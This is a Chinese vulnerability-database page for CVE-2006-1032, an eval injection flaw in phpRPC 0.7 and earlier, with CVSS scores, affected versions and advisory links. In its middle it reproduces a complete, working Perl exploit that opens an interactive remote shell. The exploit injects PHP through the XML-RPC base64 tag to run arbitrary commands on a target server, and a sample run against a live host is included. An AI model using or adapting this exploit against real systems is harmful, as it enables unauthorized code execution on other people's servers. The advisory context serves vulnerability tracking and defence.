CVE-2006-1032
CVSS7.5
发布时间 :2006-03-07 06:02:00
修订时间 :2011-03-07 21:31:45
NMCOE    

[原文]Eval injection vulnerability in the decode function in rpc_decoder.php for phpRPC 0.7 and earlier, as used by runcms, exoops, and possibly other programs, allows remote attackers to execute arbitrary PHP code via the base64 tag.


[CNNVD]PHPRPC 'rpc_decoder.php'库远程码执行漏洞(CNNVD-200603-112)

        在phpRPC 0.7及其早期版本中的rpc_decoder.php,其解码函数中存在Eval注入漏洞,当被runcms,exoops和可能其它程序使用时,远程攻击者可以通过base64 tag,执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:phprpc:phprpc:0.8
cpe:/a:phprpc:phprpc:0.7
cpe:/a:phprpc:phprpc:0.9

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1032
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1032
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-112
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/0745
(UNKNOWN)  VUPEN  ADV-2006-0745
http://www.securityfocus.com/bid/16833
(UNKNOWN)  BID  16833
http://www.securityfocus.com/archive/1/426193
(VENDOR_ADVISORY)  BUGTRAQ  20060226 phpRPC Library Remote Code Execution
http://www.gulftech.org/?node=research&article_id=00105-02262006
(VENDOR_ADVISORY)  MISC  http://www.gulftech.org/?node=research&article_id=00105-02262006
http://securitytracker.com/id?1015691
(UNKNOWN)  SECTRACK  1015691
http://securityreason.com/securityalert/502
(UNKNOWN)  SREASON  502
http://secunia.com/advisories/19058
(UNKNOWN)  SECUNIA  19058
http://secunia.com/advisories/19028
(UNKNOWN)  SECUNIA  19028

- 漏洞信息

PHPRPC 'rpc_decoder.php'库远程码执行漏洞
高危 输入验证
2006-03-07 00:00:00 2006-03-08 00:00:00
远程  
        在phpRPC 0.7及其早期版本中的rpc_decoder.php,其解码函数中存在Eval注入漏洞,当被runcms,exoops和可能其它程序使用时,远程攻击者可以通过base64 tag,执行任意PHP代码。

- 公告与补丁

        目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本.

- 漏洞信息 (1542)

phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution (EDBID:1542)
php webapps
2006-03-01 Verified
0 LorD
N/A [点击下载]
#!/usr/bin/perl
#
#root@host [~]# perl rpc.pl phprpc.sourceforge.net /modules/phpRPC/server.php
#--== IHS IRAN HOMELAND SECURITY ==--
#
#phpRPC <= 0.7 commands execute exploit by LorD (http://www.ihs.ir)
#
#[IRAN HOMELAND SECURITY]$ uname -a;id;pwd
#Linux sc8-pr-web9.sourceforge.net 2.6.10-1.771_FC2smp #1 SMP Mon Mar 28 01:10:51 EST 2005 i686 i686 i386 GNU/Linux
#uid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)
#/home/groups/p/ph/phprpc/htdocs/modules/phpRPC
#_end_
#[IRAN HOMELAND SECURITY]$
#
#
# 0rginal Advisory : http://www.gulftech.org/?node=research&article_id=00105-02262006
# Greetz to NT and C0d3r
use IO::Socket;
print "--== IHS IRAN HOMELAND SECURITY ==--\n\n";
print "phpRPC <= 0.7 commands execute exploit by LorD (http://www.ihs.ir)\n\n";
if ($ARGV[0] && $ARGV[1])
{
	$host = $ARGV[0];
	$xml = $ARGV[1];
	$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
	PeerPort => "80") || die "connecterror\n";
	while (1) {
		print '[IRAN HOMELAND SECURITY]$ ';
		$cmd = <STDIN>;
		chop($cmd);
		last if ($cmd eq 'exit');
		$xmldata = "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><base64>'));echo '_begin_\n';echo `".$cmd."`;echo '_end_\n';exit;</param></params></methodCall>";
		print $sock "POST ".$xml." HTTP/1.1\n";
		print $sock "Host: ".$host."\n";
		print $sock "Content-Type: text/xml\n";
		print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
		$good=0;
		while ($ans = <$sock>)
		{
			if ($good == 1) { print "$ans"; }
			last if ($ans =~ /^_end_/);
			if ($ans =~ /^_begin_/) { $good = 1; }
		}
		if ($good==0) {print "Exploit Failed\n";exit();}
	}
}
else {
	print "Usage: perl rpc.pl host path_to_phpRPC\n\n";
	print "Example: perl rpc.pl target.com /server.php\n";
	exit;
}

# milw0rm.com [2006-03-01]
		

- 漏洞信息

23514
phpRPC Library rpc_decoder.php decode() Function Arbitrary Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Commercial Uncoordinated Disclosure

- 漏洞描述

- 时间线

2006-02-26 Unknow
2006-03-06 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站